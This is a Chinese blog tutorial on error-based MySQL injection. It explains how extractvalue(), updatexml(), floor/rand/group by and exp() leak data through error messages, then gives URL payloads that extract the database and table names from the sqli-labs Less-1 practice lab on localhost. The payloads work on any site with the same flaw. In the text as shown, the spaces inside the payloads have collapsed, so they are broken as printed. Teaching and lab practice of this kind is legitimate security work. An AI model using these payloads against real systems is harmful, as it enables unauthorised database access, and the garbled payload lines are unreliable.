SQL报错注入的示例分析(SQL,开发技术)

时间:2024-05-06 20:32:44 作者 : 石家庄SEO 分类 : 开发技术
  • TAG :

    SQL报错注入概述

    通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面面的错误提示回显出来。

    报错注入的前提条件

    • Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上

    • 后台未对一些具有报错功能的函数(如extractvalue、updatexml等)进行过滤

    Xpath类型函数

    extractvalue()

    作用:对XML文档进行查询,相当于在HTML文件中用标签查找元素。

    语法: extractvalue( XML_document, XPath_string )

    • 参数1:XML_document是String格式,为XML文档对象的名称

    • 参数2:XPath_string(Xpath格式的字符串),注入时可操作的地方

    报错原理:xml文档中查找字符位置是用/xxx/xxx/xxx/...这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx‘

    updatexml()

    作用:改变文档中符合条件的节点的值。

    语法: updatexml( XML_document, XPath_string, new_value )

    • 参数1:XML_document是String格式,为XML文档对象的名称

    • 参数2:XPath_string(Xpath格式的字符串),注入时可操作的地方

    • 参数3:new_value,String格式,替换查找到的符合条件的数据

    报错原理:同extractvalue()

    其他函数

    floor()、rand()、count()、group by联用

    作用

    floor(x):对参数x向下取整

    rand():生成一个0~1之间的随机浮点数

    count(*):统计某个表下总共有多少条记录

    group by x: 按照 (by) 一定的规则(x)进行分组

    报错原理:group by与rand()使用时,如果临时表中没有该主键,则在插入前会再计算一次rand(),然后再由group by将计算出来的主键直接插入到临时表格中,导致主键重复报错

    exp()(5.5.5<= MySQL数据库版本号<=5.5.49)

    作用:计算以e(自然常数)为底的幂值

    语法: exp(x)

    报错原理:当参数x超过710时,exp()函数会报错,错误信息如:DOUBLE value is of range:

    MySQL数据库报错功能函数总汇

    SQL报错注入的示例分析

    报错注入实例

    extractvalue()

    依然用sqli/Less-1

    直接用报错函数进行暴库操作

    暴库
    http://127.0.0.1/sqli/Less-1/?id=1'andextractvalue(1,concat('~',database()))--+

    SQL报错注入的示例分析

    暴表
    http://127.0.0.1/sqli/Less-1/?id=1'andextractvalue(1,concat('~',(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema='security')))--+

    SQL报错注入的示例分析

    后面的步骤大致相同,不再演示

    updatexml()

    暴库
    http://127.0.0.1/sqli/Less-1/?id=1'andupdatexml(1,concat('~',database()),1)--+
    暴表
    http://127.0.0.1/sqli/Less-1/?id=1'andupdatexml(1,concat('~',(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema='security')),1)--+

    SQL报错注入的示例分析

     </div> <div class="zixun-tj-product adv-bottom"></div> </div> </div> <div class="prve-next-news">
    本文:SQL报错注入的示例分析的详细内容,希望对您有所帮助,信息来源于网络。
    上一篇:Java线程运行的示例分析下一篇:

    2 人围观 / 0 条评论 ↓快速评论↓

    (必须)

    (必须,保密)

    阿狸1 阿狸2 阿狸3 阿狸4 阿狸5 阿狸6 阿狸7 阿狸8 阿狸9 阿狸10 阿狸11 阿狸12 阿狸13 阿狸14 阿狸15 阿狸16 阿狸17 阿狸18